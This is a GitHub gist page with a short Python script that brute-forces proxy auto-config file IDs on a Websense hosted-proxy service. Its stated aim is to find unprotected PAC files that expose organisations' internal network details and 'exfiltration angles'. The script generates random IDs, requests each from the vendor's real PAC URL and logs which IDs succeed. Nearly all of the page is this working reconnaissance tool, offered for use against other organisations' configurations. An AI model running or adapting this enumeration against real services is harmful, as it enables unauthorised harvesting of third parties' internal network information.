Last active
October 7, 2024 20:03
-
-
Save GarnetSunset/f22be96afd0328b01a77b131707ebe5c to your computer and use it in GitHub Desktop.
Bruteforcing Websense to find unprotected pac files that can be used to get info about internal networks and exfiltration angles.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # GarnetSunset | |
| ## Websense bruteforcing script | |
| import requests | |
| import rstr | |
| regex = r"^(([b-df-hj-np-tv-z2346789]{8})\2?(?!\2))+$" | |
| pacUrl = "http://pac.webdefence.global.blackspider.com/proxy.pac?p=" | |
| success = open("successful.txt","a+") | |
| lineList = success.readlines() | |
| forbidden = open("forbidden.txt","a+") | |
| lineList = lineList + forbidden.readlines() | |
| failed = open("failed.txt","a+") | |
| lineList = lineList + failed.readlines() | |
| count = 0 | |
| try: | |
| while True: | |
| regexString = rstr.xeger(regex) | |
| randomPacString = regexString[:8] | |
| if randomPacString not in lineList: | |
| r = requests.get(pacUrl+randomPacString, allow_redirects=True) | |
| count += 1 | |
| if("You have browsed from an unrecognized IP address." in r.text): | |
| forbidden.write(randomPacString+"\n") | |
| elif("Invalid policy reference." in r.text): | |
| failed.write(randomPacString+"\n") | |
| else: | |
| success.write(randomPacString+"\n") | |
| except KeyboardInterrupt: | |
| print("We tested "+str(count)+"possible entries") | |
| success.close() | |
| forbidden.close() | |
| failed.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment